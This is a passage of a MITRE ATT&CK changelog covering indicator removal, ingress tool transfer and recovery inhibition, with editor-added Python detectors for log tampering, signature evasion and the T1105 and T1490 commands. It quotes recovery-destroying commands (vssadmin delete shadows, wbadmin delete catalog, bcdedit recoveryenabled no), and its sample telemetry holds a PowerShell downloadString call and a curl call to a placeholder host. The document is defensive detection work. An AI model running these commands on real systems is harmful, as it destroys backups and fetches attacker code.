| x_mitre_data_sources[4] | Windows Registry: Windows Registry Key Deletion | Command: Command Execution |
| x_mitre_data_sources[5] | Process: OS API Execution | Windows Registry: Windows Registry Key Modification |
| x_mitre_data_sources[6] | Command: Command Execution | File: File Metadata |
| x_mitre_data_sources[7] | Network Traffic: Network Traffic Content | Firewall: Firewall Rule Modification |
| x_mitre_data_sources[8] | User Account: User Account Authentication | Scheduled Job: Scheduled Job Modification |
| x_mitre_data_sources[9] | File: File Metadata | Process: Process Creation |
| x_mitre_version | 1.2 | 2.0 |
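The new T1070 description names Bash history and /var/log/* as the Linux artifacts adversaries remove. The following is an added example by the editor, not text or code from the ATT&CK changelog: it correlates Linux auditd SYSCALL and PATH records by audit serial and flags deletion or truncation of watched log paths, suppressing the expected rotation by logrotate. The audit lines are constructed, the x86_64 syscall numbers are an assumption about the audited architecture, and the quarantine directory is a hypothetical stand-in for AV-quarantined files.

```python
"""Added example (editor's illustration, not part of the ATT&CK changelog):
correlate Linux auditd SYSCALL and PATH records to flag deletion or
truncation of host logs and shell history (T1070 Indicator Removal)."""
import re
from collections import defaultdict
from fnmatch import fnmatchcase

# Assumption: x86_64 audit arch (arch=c000003e). Syscall numbers for that ABI.
TRUNCATE_SYSCALLS = {"76": "truncate", "77": "ftruncate"}

# Paths the technique description names (/var/log/*, bash history) plus a
# hypothetical quarantine directory standing in for AV-quarantined files.
WATCHED_GLOBS = ["/var/log/*", "*/.bash_history", "/var/lib/quarantine/*"]

# Processes expected to rotate or remove logs on this host; tune per fleet.
EXPECTED_COMM = {"logrotate"}

KV = re.compile(r'(\w+)=("[^"]*"|\S+)')
SERIAL = re.compile(r"msg=audit\((?P<ts>[\d.]+):(?P<serial>\d+)\)")


def parse_record(line):
    """Turn one auditd line into a dict; quotes are stripped from values."""
    fields = {k: v.strip('"') for k, v in KV.findall(line)}
    m = SERIAL.search(line)
    fields["_serial"] = m.group("serial") if m else None
    return fields


def find_log_tampering(lines):
    """Group records by audit serial and return alerts for watched paths."""
    events = defaultdict(lambda: {"syscall": None, "paths": []})
    for line in lines:
        rec = parse_record(line)
        if rec.get("type") == "SYSCALL":
            events[rec["_serial"]]["syscall"] = rec
        elif rec.get("type") == "PATH":
            events[rec["_serial"]]["paths"].append(rec)

    alerts = []
    for serial, ev in events.items():
        sc = ev["syscall"]
        if sc is None:
            continue
        for p in ev["paths"]:
            name = p.get("name", "")
            if p.get("nametype") == "PARENT":
                continue  # the directory entry, not the file itself
            if not any(fnmatchcase(name, g) for g in WATCHED_GLOBS):
                continue
            if p.get("nametype") == "DELETE":
                action = "delete"
            elif sc.get("syscall") in TRUNCATE_SYSCALLS:
                action = TRUNCATE_SYSCALLS[sc["syscall"]]
            else:
                continue  # ordinary read/write access is not tampering
            if sc.get("comm") in EXPECTED_COMM:
                continue  # expected rotation; keep in logs, do not alert
            alerts.append({"serial": serial, "path": name, "action": action,
                           "comm": sc.get("comm"), "exe": sc.get("exe"),
                           "uid": sc.get("uid")})
    return alerts


# Constructed sample records (not real audit output).
SAMPLE_AUDIT = [
    'type=SYSCALL msg=audit(1650000000.100:4001): arch=c000003e syscall=87 success=yes exit=0 uid=0 comm="rm" exe="/usr/bin/rm" key="log-tamper"',
    'type=PATH msg=audit(1650000000.100:4001): item=0 name="/var/log/" inode=2 mode=040755 nametype=PARENT',
    'type=PATH msg=audit(1650000000.100:4001): item=1 name="/var/log/auth.log" inode=1301 mode=0100640 nametype=DELETE',
    'type=SYSCALL msg=audit(1650000000.200:4002): arch=c000003e syscall=76 success=yes exit=0 uid=0 comm="truncate" exe="/usr/bin/truncate" key="log-tamper"',
    'type=PATH msg=audit(1650000000.200:4002): item=0 name="/root/.bash_history" inode=2210 mode=0100600 nametype=NORMAL',
    'type=SYSCALL msg=audit(1650000000.300:4003): arch=c000003e syscall=87 success=yes exit=0 uid=0 comm="logrotate" exe="/usr/sbin/logrotate" key="log-tamper"',
    'type=PATH msg=audit(1650000000.300:4003): item=1 name="/var/log/syslog.7.gz" inode=1399 mode=0100640 nametype=DELETE',
    'type=SYSCALL msg=audit(1650000000.400:4004): arch=c000003e syscall=87 success=yes exit=0 uid=1000 comm="rm" exe="/usr/bin/rm"',
    'type=PATH msg=audit(1650000000.400:4004): item=1 name="/tmp/scratch.txt" inode=77 mode=0100644 nametype=DELETE',
]

if __name__ == "__main__":
    for alert in find_log_tampering(SAMPLE_AUDIT):
        print(alert)
```

To produce records like these, a watch such as `auditctl -w /var/log -p wa -k log-tamper` is enough; the `w` permission also catches the `echo > file` case, which truncates through openat(O_TRUNC) rather than the truncate syscalls matched above. Treat the logrotate suppression as a baseline, not a trust decision: an adversary can name a binary logrotate, so compare `exe` against the package-managed path as well.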
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_contributors | Blake Strom, Microsoft 365 Defender | |
| x_mitre_data_sources | Windows Registry: Windows Registry Key Deletion | |
| x_mitre_data_sources | User Account: User Account Authentication | |
| x_mitre_platforms | Network | |
| x_mitre_platforms | Office 365 | |
| x_mitre_platforms | Google Workspace | |
| Description |
|---|
| Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems. A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware. |
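The description above is conceptual: a tool quarantined on a file signature is edited to dodge that one signature and reused. The following is an added example by the editor, not code from the ATT&CK page: it exercises a brittle single-string signature and an N-of-M indicator rule against a constructed byte blob, then applies the adversary's one-string patch to show which rule survives. The blob, the strings in it and the indicator names are all constructed for the illustration; nothing here is real malware.

```python
"""Added example (editor's illustration, not part of the ATT&CK changelog):
a single exact-string signature versus an N-of-M indicator rule, exercised
against a tool whose author removes the one indicator that got it quarantined
(T1027.005 Indicator Removal from Tools)."""
import hashlib
import re

# Constructed stand-in for a malicious tool: a byte blob carrying three
# strings a defender might key on. No real malware here.
ORIGINAL_TOOL = (
    b"\x4d\x5a\x90\x00" + b"\x00" * 60 + (
        b"powershell -nop -w hidden -enc SQBFAFgA\x00"
        b"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\x00"
        b"\\\\.\\pipe\\msagent_4f1a\x00"
    )
)

# Brittle rule: one exact byte string (the kind of indicator a quarantine
# notice or a public YARA rule reveals to the tool's author).
BRITTLE_SIGNATURE = b"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


def brittle_match(data: bytes) -> bool:
    return BRITTLE_SIGNATURE in data


# Resilient rule: several independent indicators, each normalised (case,
# whitespace, variable suffixes), fired on a threshold rather than on any one.
RESILIENT_INDICATORS = {
    "encoded_powershell": re.compile(rb"powershell\b[^\x00]*-e(?:nc|ncodedcommand)?\b", re.I),
    "legacy_user_agent": re.compile(rb"mozilla/4\.0\s*\(compatible;\s*msie\s*6\.0", re.I),
    "named_pipe_prefix": re.compile(rb"\\\\\.\\pipe\\msagent_[0-9a-f]{4}", re.I),
}


def resilient_hits(data: bytes) -> set:
    return {name for name, rx in RESILIENT_INDICATORS.items() if rx.search(data)}


def resilient_match(data: bytes, threshold: int = 2) -> bool:
    return len(resilient_hits(data)) >= threshold


def patch_indicator(data: bytes, old: bytes, new: bytes) -> bytes:
    """The adversary's move: swap the one string they believe was detected.
    Same-length replacement keeps every offset in the binary intact."""
    assert len(old) == len(new), "keep offsets stable for a binary patch"
    return data.replace(old, new)


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def demo():
    patched = patch_indicator(ORIGINAL_TOOL, b"MSIE 6.0", b"MSIE 7.0")
    return {
        "hash_changed": sha256(patched) != sha256(ORIGINAL_TOOL),
        "brittle_before": brittle_match(ORIGINAL_TOOL),
        "brittle_after": brittle_match(patched),
        "resilient_before": resilient_hits(ORIGINAL_TOOL),
        "resilient_after": resilient_hits(patched),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Two points fall out of the run: the file hash changes with a one-byte edit, so hash IOCs are the most perishable indicator of all, and a rule that needs two of three independent features still fires after the patch. The adversary can of course patch all three, but each extra indicator they must find and remove raises the cost and the chance that a behavioural detection (the pipe creation, the encoded PowerShell child process) catches the re-used tool.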
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_data_sources | ['Application Log: Application Log Content'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-29 21:03:09.766000+00:00 | 2022-04-28 16:07:48.062000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. (Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017) Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-20 22:09:22.559000+00:00 | 2022-05-05 05:06:38.938000+00:00 |
| external_references[1]['source_name'] | VectorSec ForFiles Aug 2017 | Evi1cg Forfiles Nov 2017 |
| external_references[1]['description'] | vector_sec. (2017, August 11). Defenders watching launches of cmd? What about forfiles?. Retrieved January 22, 2018. | Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved January 22, 2018. |
| external_references[1]['url'] | https://twitter.com/vector_sec/status/896049052642533376 | https://twitter.com/Evi1cg/status/935027922397573120 |
| external_references[2]['source_name'] | Evi1cg Forfiles Nov 2017 | RSA Forfiles Aug 2017 |
| external_references[2]['description'] | Evi1cg. (2017, November 26). block cmd.exe ? try this :. Retrieved January 22, 2018. | Partington, E. (2017, August 14). Are you looking out for forfiles.exe (if you are watching for cmd.exe). Retrieved January 22, 2018. |
| external_references[2]['url'] | https://twitter.com/Evi1cg/status/935027922397573120 | https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe |
| external_references[3]['source_name'] | RSA Forfiles Aug 2017 | VectorSec ForFiles Aug 2017 |
| external_references[3]['description'] | Partington, E. (2017, August 14). Are you looking out for forfiles.exe (if you are watching for cmd.exe). Retrieved January 22, 2018. | vector_sec. (2017, August 11). Defenders watching launches of cmd? What about forfiles?. Retrieved January 22, 2018. |
| external_references[3]['url'] | https://community.rsa.com/community/products/netwitness/blog/2017/08/14/are-you-looking-out-for-forfilesexe-if-you-are-watching-for-cmdexe | https://twitter.com/vector_sec/status/896049052642533376 |
| x_mitre_data_sources[0] | Process: Process Creation | Command: Command Execution |
| x_mitre_data_sources[1] | Command: Command Execution | Process: Process Creation |
| x_mitre_defense_bypassed[1] | Application control | Application Control |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_defense_bypassed | Application control by file name or path | |
| Old Description | New Description |
|---|---|
| Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp. | Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)).
Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016)
On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['John Page (aka hyp3rlinx), ApparitionSec'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-20 15:42:48.595000+00:00 | 2022-05-20 17:38:35.985000+00:00 |
| description | Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp. | Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)).
Files can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016)
On Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas) |
| x_mitre_data_sources[2] | Network Traffic: Network Connection Creation | File: File Creation |
| x_mitre_detection | Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2) | Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as [ftp](https://attack.mitre.org/software/S0095), that does not normally occur may also be suspicious.
Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Specifically, for the finger utility on Windows and Linux systems, monitor command line or terminal execution for the finger command. Monitor network activity for TCP port 79, which is used by the finger utility, and Windows netsh interface portproxy modifications to well-known ports such as 80 and 443. Furthermore, monitor file system for the download/creation and execution of suspicious files, which may indicate adversary-downloaded payloads. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2) |
| x_mitre_version | 2.0 | 2.1 |
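The revised detection text above is specific enough to turn into logic: finger on the command line and on TCP/79, netsh portproxy rules forwarding to 80 or 443, the PowerShell `downloadString`/`Invoke-WebRequest` primitives, and the native transfer utilities. The following is an added example by the editor, not code from the ATT&CK page or any product: it triages constructed process-creation and flow records against those points and ranks the results. Hosts, command lines, the TEST-NET address 203.0.113.5 and the severity tiers are all editor assumptions; the "medium" tier exists because curl, wget and scp are everyday tools on most Linux hosts and should be baselined, not paged on.

```python
"""Added example (editor's illustration, not part of the ATT&CK changelog):
triage process and flow telemetry against the T1105 detection guidance:
finger as a downloader, outbound TCP/79, netsh portproxy to well-known
ports, PowerShell web-download primitives and native transfer utilities."""
import re

FINGER_PORT = 79
WELL_KNOWN_TARGETS = {80, 443}

# (severity, pattern, reason). "medium" rules are for baselining, not paging.
COMMAND_RULES = [
    ("high", re.compile(r"\bfinger(?:\.exe)?\b[^|]*\S+@\S+", re.I),
     "finger invoked with user@host: possible payload fetch over TCP/79"),
    ("high", re.compile(r"net\.webclient\)?\s*\.downloadstring|invoke-webrequest|\biwr\b", re.I),
     "PowerShell web download primitive"),
    ("medium", re.compile(r"(?:^|[\\/\s])(?:curl|wget|scp|sftp|tftp|rsync)(?:\.exe)?\b", re.I),
     "native transfer utility executed"),
]
PORTPROXY = re.compile(
    r"\bnetsh(?:\.exe)?\b.*\binterface\s+portproxy\b.*\badd\b.*\bconnectport=(\d+)", re.I)


def triage_process(event):
    """event: {"host", "image", "cmdline"} -> list of (severity, reason)."""
    cmd = event["cmdline"]
    findings = [(sev, why) for sev, rx, why in COMMAND_RULES if rx.search(cmd)]
    m = PORTPROXY.search(cmd)
    if m:
        port = int(m.group(1))
        # Forwarding to 80/443 hides the real destination port from flow-based
        # allowlists; the text singles these out.
        sev = "high" if port in WELL_KNOWN_TARGETS else "medium"
        findings.append((sev, f"netsh portproxy added, forwarding to port {port}"))
    return findings


def triage_flow(flow):
    """flow: {"host", "proto", "dst_ip", "dst_port"} -> list of (severity, reason)."""
    findings = []
    if flow["proto"] == "tcp" and flow["dst_port"] == FINGER_PORT:
        findings.append(("high", f"outbound TCP/{FINGER_PORT} (finger) to {flow['dst_ip']}"))
    return findings


def triage(processes, flows):
    """Flatten everything into (host, severity, reason) rows, high first."""
    rows = []
    for ev in processes:
        rows += [(ev["host"], sev, why) for sev, why in triage_process(ev)]
    for fl in flows:
        rows += [(fl["host"], sev, why) for sev, why in triage_flow(fl)]
    return sorted(rows, key=lambda r: (r[1] != "high", r[0]))


# Constructed sample telemetry (not from any real host).
SAMPLE_PROCESSES = [
    {"host": "ws01", "image": r"C:\Windows\System32\finger.exe",
     "cmdline": "finger.exe stage1@203.0.113.5"},
    {"host": "ws01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -c \"IEX(New-Object Net.WebClient).downloadString('http://203.0.113.5/a.ps1')\""},
    {"host": "ws01", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh interface portproxy add v4tov4 listenport=8443 listenaddress=0.0.0.0 connectport=443 connectaddress=203.0.113.5"},
    {"host": "lx01", "image": "/usr/bin/curl",
     "cmdline": "/usr/bin/curl -o /tmp/.x http://203.0.113.5/x"},
    {"host": "ws01", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\bob\notes.txt"},
]
SAMPLE_FLOWS = [
    {"host": "ws01", "proto": "tcp", "dst_ip": "203.0.113.5", "dst_port": 79},
    {"host": "ws01", "proto": "tcp", "dst_ip": "198.51.100.20", "dst_port": 443},
]

if __name__ == "__main__":
    for host, sev, why in triage(SAMPLE_PROCESSES, SAMPLE_FLOWS):
        print(f"{sev:6} {host:5} {why}")
```

The command-line rules are deliberately loose on the left (any path, optional `.exe`) and tight on the right, so renaming the binary still has to carry the tell-tale arguments; a copied finger.exe under another name still needs `user@host`. The portproxy rule matches only `add`; if you also want to catch rule removal as cleanup, extend it to `delete` and raise the event with T1070 context.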
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 't1105_lolbas', 'description': 'LOLBAS. (n.d.). LOLBAS Mapped to T1105. Retrieved March 11, 2022.', 'url': 'https://lolbas-project.github.io/#t1105'} | |
| external_references | {'source_name': 'PTSecurity Cobalt Dec 2016', 'description': 'Positive Technologies. (2016, December 16). Cobalt Snatch. Retrieved October 9, 2018.', 'url': 'https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-Snatch-eng.pdf'} | |
| x_mitre_data_sources | Network Traffic: Network Connection Creation | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | File: File Creation | |
| Old Description | New Description |
|---|---|
| Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) A number of native Windows utilities have been used by adversaries to disable or delete system recovery features: * vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet * [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete * wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet * bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no |
Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)
A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:
* vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet
* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete
* wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet
* bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no |
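The four utilities listed above give concrete command lines to match on, and the bcdedit example also shows the usual shape of the activity: several recovery features hit in one chained command. The following is an added example by the editor, not code from the ATT&CK page or any product: it splits a cmd.exe chain on its operators, checks each segment against the listed utilities and grades the result, escalating when more than one recovery feature is targeted in a single command line. The feature names and severity labels are editor assumptions; the chain splitter does not handle operators hidden inside quotes, which is noted in the code.

```python
"""Added example (editor's illustration, not part of the ATT&CK changelog):
classify a Windows command line for the recovery-inhibiting utilities the
T1490 description lists (vssadmin, wmic, wbadmin, bcdedit), splitting cmd.exe
chains so each segment is checked on its own."""
import re

# (feature that is being disabled, pattern). Patterns anchor on the utility
# name plus the arguments that actually remove or disable something, so
# `vssadmin list shadows` or `bcdedit /enum` do not fire.
RECOVERY_RULES = [
    ("shadow-copies", re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\s+shadows\b", re.I)),
    ("shadow-copies", re.compile(r"\bwmic(?:\.exe)?\b.*\bshadowcopy\b.*\bdelete\b", re.I)),
    ("backup-catalog", re.compile(r"\bwbadmin(?:\.exe)?\b.*\bdelete\s+catalog\b", re.I)),
    ("boot-recovery", re.compile(r"\bbcdedit(?:\.exe)?\b.*\brecoveryenabled\s+no\b", re.I)),
    ("boot-recovery", re.compile(r"\bbcdedit(?:\.exe)?\b.*\bbootstatuspolicy\s+ignoreallfailures\b", re.I)),
]

# cmd.exe chain operators, longest first. Operators inside quotes are not
# handled; a command line that hides `&` in a quoted argument needs a real
# cmd.exe tokenizer.
CHAIN_SPLIT = re.compile(r"\s*(?:&&|\|\||&|\|)\s*")


def split_chain(cmdline):
    return [seg for seg in CHAIN_SPLIT.split(cmdline) if seg.strip()]


def recovery_inhibition_hits(cmdline):
    """Return (segment, feature, utility) for every matching chain segment."""
    hits = []
    for seg in split_chain(cmdline):
        for feature, rx in RECOVERY_RULES:
            m = rx.search(seg)
            if m:
                utility = re.match(r"\S+", seg[m.start():]).group(0).lower()
                utility = re.sub(r"\.exe$", "", utility)
                hits.append((seg, feature, utility))
    return hits


def classify(cmdline):
    """Grade a command line: none, high (one feature), critical (several)."""
    hits = recovery_inhibition_hits(cmdline)
    features = sorted({f for _, f, _ in hits})
    utilities = sorted({u for _, _, u in hits})
    if not hits:
        severity = "none"
    elif len(features) >= 2:
        severity = "critical"   # shadow copies + catalog, the ransomware pattern
    else:
        severity = "high"
    return {"severity": severity, "features": features,
            "utilities": utilities, "hits": hits}


# Constructed command lines; the first three echo the description's examples.
SAMPLE_COMMANDS = [
    "vssadmin.exe delete shadows /all /quiet",
    "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no",
    'cmd.exe /c "wmic shadowcopy delete && wbadmin delete catalog -quiet"',
    "vssadmin list shadows",
]

if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        result = classify(cmd)
        print(f"{result['severity']:8} {result['features']} <- {cmd}")
```

Any single hit is already high-fidelity on most fleets, because these deletions have almost no legitimate interactive use; backup software calls the VSS API directly rather than shelling out to vssadmin. Where the command comes wrapped in `cmd.exe /c "..."`, the leading quote ends up in the first segment, which the utility-anchored patterns tolerate.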
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator', 'root', 'SYSTEM', 'User'] | |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-07-14 19:33:52.512000+00:00 | 2022-04-19 23:26:59.186000+00:00 |
| description | Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)
A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:
* vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet
* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete
* wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet
* bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no |
Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)
A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:
* vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet
* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete
* wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet
* bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no |
| external_references[1]['source_name'] | Talos Olympic Destroyer 2018 | FireEye WannaCry 2017 |
| external_references[1]['description'] | Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019. | Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019. |
| external_references[1]['url'] | https://blog.talosintelligence.com/2018/02/olympic-destroyer.html | https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html |
| external_references[2]['source_name'] | FireEye WannaCry 2017 | Talos Olympic Destroyer 2018 |
| external_references[2]['description'] | Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019. | Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019. |
| external_references[2]['url'] | https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html | https://blog.talosintelligence.com/2018/02/olympic-destroyer.html |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation | |
| x_mitre_data_sources | Command: Command Execution | |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation | |
